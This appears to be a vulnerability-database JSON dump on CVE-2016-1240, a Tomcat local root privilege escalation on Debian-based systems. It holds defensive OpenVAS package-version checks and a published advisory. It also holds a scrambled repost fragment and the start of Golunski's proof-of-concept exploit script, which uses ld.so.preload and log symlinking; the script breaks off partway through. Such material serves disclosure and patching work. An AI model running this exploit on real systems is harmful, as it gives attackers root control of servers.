CVE-2 0 1 6-1 2 4 0\

\"

echo-e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers. com \\0 3 3[0m\"

# Args

if [ $# -lt 1 ]; then

echo-e \"\

[!] Exploit usage: \

\

$0 path_to_catalina. out [-deferred]\

\"

exit 3

fi

if [ \"$2\" = \"-deferred\" ]; then

mode=\"deferred\"





**[1] [[2]](<79941_2.htm>) [[3]](<79941_3.htm>) [next](<79941_2.htm>)**

", "modified": "2016-10-08T00:00:00", "published": "2016-10-08T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/79941.htm", "id": "MYHACK58:62201679941", "type": "myhack58", "title": "Vulnerability warning: Tomcat aeration local mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 reference PoC-the exploit-warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:54:16", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 2, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703669", "id": "OPENVAS:703669", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3669.nasl 6608 2017-07-07 12:05:05Z cfischer $

# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#





if(description)

{

script_id(703669);

script_version(\"$Revision: 6608 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");

script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");

script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name: \"solution_type\", value: \"VendorFix\");

script_tag(name: \"qod_type\", value: \"package\");



script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3669.html\");





script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");

script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");

script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet

and the JavaServer Pages (JSP) specifications from Sun Microsystems, and provides a

'pure Java' HTTP web server environment for Java code to run.\");

script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this

problem has been fixed in version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.\");

script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name: \"vuldetect\", value: \"This check tests the installed software

version using the apt package manager.\");

exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}



if (report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99); # Not vulnerable.

}

", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:46", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 5, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703669", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703669", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3669.nasl 14279 2019-03-18 14:48:34Z cfischer $

# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.703669\");

script_version(\"$Revision: 14279 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"package\");



script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3669.html\");



script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");

script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");

script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this

problem has been fixed in version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.\");

script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name:\"vuldetect\", value:\"This check tests the installed software

version using the apt package manager.\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}



if(report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99);

}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:20", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 5, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703670", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3670.nasl 14279 2019-03-18 14:48:34Z cfischer $

# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.703670\");

script_version(\"$Revision: 14279 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"package\");



script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3670.html\");



script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");

script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");

script_tag(name:\"solution\", value:\"For the stable distribution (jessie),

this problem has been fixed in version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.\");

script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name:\"vuldetect\", value:\"This check tests the installed software

version using the apt package manager.\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}



if(report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99);

}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:05", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 2, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703670", "id": "OPENVAS:703670", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3670.nasl 6608 2017-07-07 12:05:05Z cfischer $

# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#





if(description)

{

script_id(703670);

script_version(\"$Revision: 6608 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");

script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");

script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name: \"solution_type\", value: \"VendorFix\");

script_tag(name: \"qod_type\", value: \"package\");



script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3670.html\");





script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");

script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");

script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java

Servlet and the JavaServer Pages (JSP) specifications from Oracle, and provides

a 'pure Java' HTTP web server environment for Java code to run.\");

script_tag(name: \"solution\", value: \"For the stable distribution (jessie),

this problem has been fixed in version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.\");

script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name: \"vuldetect\", value: \"This check tests the installed software

version using the apt package manager.\");

exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}



if (report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99); # Not vulnerable.

}

", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "edition": 9, "published": "2016-09-20T00:00:00", "title": "Ubuntu Update for tomcat8 USN-3081-1", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842892", "sourceData": "###############################################################################

# OpenVAS Vulnerability Test

#

# Ubuntu Update for tomcat8 USN-3081-1

#

# Authors:

# System Generated Check

#

# Copyright:

# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net

#

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License version 2

# (or any later version), as published by the Free Software Foundation.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

###############################################################################



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.842892\");

script_version(\"$Revision: 14140 $\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:58 +0200 (Tue, 20 Sep 2016)\");

script_cve_id(\"CVE-2016-1240\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"qod_type\", value:\"package\");

script_name(\"Ubuntu Update for tomcat8 USN-3081-1\");

script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'

package(s) announced via the referenced advisory.\");

script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");

script_tag(name:\"insight\", value:\"Dawid Golunski discovered that the Tomcat

init script incorrectly handled creating log files. A remote attacker could

possibly use this issue to obtain root privileges. (CVE-2016-1240)



This update also reverts a change in behaviour introduced in USN-3024-1 by

setting mapperContextRootRedirectEnabled to True by default.\");

script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 16.04 LTS,

Ubuntu 14.04 LTS,

Ubuntu 12.04 LTS\");

script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");



script_xref(name:\"USN\", value:\"3081-1\");

script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3081-1/\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");

script_family(\"Ubuntu Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



release = dpkg_get_ssh_release();

if(!release)

exit(0);



res = \"\";



if(release == \"UBUNTU14.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}





if(release == \"UBUNTU12.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat6-java\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat6\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}





if(release == \"UBUNTU16.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "

Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation", "edition": 1, "published": "2016-10-03T00:00:00", "title": "Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1240"], "modified": "2016-10-03T00:00:00", "id": "EXPLOITPACK:1B5B3B594F0BEB22BF053920EF4C7307", "href": "", "sourceData": "=============================================

- Discovered by: Dawid Golunski

- http://legalhackers.com

- dawid (at) legalhackers.com



- CVE-2016-1240

- Release date: 30.09.2016

- Revision: 1

- Severity: High

=============================================





I. VULNERABILITY

-------------------------



Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation



Affected debian packages:



Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1



Ubuntu systems are also affected. See section VII. for details.

Other systems using the affected debian packages may also be affected.





II. BACKGROUND

-------------------------



\"The Apache Tomcat\u00c2\u00ae software is an open source implementation of the

Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket

technologies. The Java Servlet, JavaServer Pages, Java Expression Language

and Java WebSocket specifications are developed under the Java Community

Process.



The Apache Tomcat software is developed in an open and participatory

environment and released under the Apache License version 2.

The Apache Tomcat project is intended to be a collaboration of the

best-of-breed developers from around the world.



Apache Tomcat software powers numerous large-scale, mission-critical web

applications across a diverse range of industries and organizations.

Some of these users and their stories are listed on the PoweredBy wiki page.

\"



http://tomcat.apache.org/





III. INTRODUCTION

-------------------------



Tomcat (6, 7, 8) packages provided by default repositories on Debian-based

distributions (including Debian, Ubuntu etc.) provide a vulnerable

tomcat init script that allows local attackers who have already gained access

to the tomcat account (for example, by exploiting an RCE vulnerability

in a java web application hosted on Tomcat, uploading a webshell etc.) to

escalate their privileges from tomcat user to root and fully compromise the

target system.



IV. DESCRIPTION

-------------------------



The vulnerability is located in the tomcat init script provided by affected

packages, normally installed at /etc/init.d/tomcatN.



The script for tomcat7 contains the following lines:



-----[tomcat7]----



# Run the catalina.sh script as a daemon

set +e

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out



-------[eof]------



Local attackers who have gained access to the server in the context of the

tomcat user (for example, through a vulnerability in a web application) would

be able to replace the log file with a symlink to an arbitrary system file

and escalate their privileges to root once Tomcat init script (running as root)

re-opens the catalina.out file after a service restart, reboot etc.



As attackers would already have a tomcat account at the time of exploitation,

they could also kill the tomcat processes to introduce the need for a restart.





V. PROOF OF CONCEPT EXPLOIT

-------------------------



------[ tomcat-rootprivesc-deb.sh ]------



#!/bin/bash

#

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE-2016-1240

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a

# vulnerable java webapp, or locally via weak permissions on webapps in the

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]

#

# The exploit can used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#



BACKDOORSH=\"/bin/bash\"

BACKDOORPATH=\"/tmp/tomcatrootsh\"

PRIVESCLIB=\"/tmp/privesclib.so\"

PRIVESCSRC=\"/tmp/privesclib.c\"

SUIDBIN=\"/usr/bin/sudo\"



function cleanexit {

\t# Cleanup

\techo -e \"\

[+] Cleaning up...\"

\trm -f $PRIVESCSRC

\trm -f $PRIVESCLIB

\trm -f $TOMCATLOG

\ttouch $TOMCATLOG

\tif [ -f /etc/ld.so.preload ]; then

\t\techo -n > /etc/ld.so.preload 2>/dev/null

\tfi

\techo -e \"\

[+] Job done. Exiting with code $1 \

\"

\texit $1

}



function ctrl_c() {

echo -e \"\

[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"

\tcleanexit 0

}



#intro

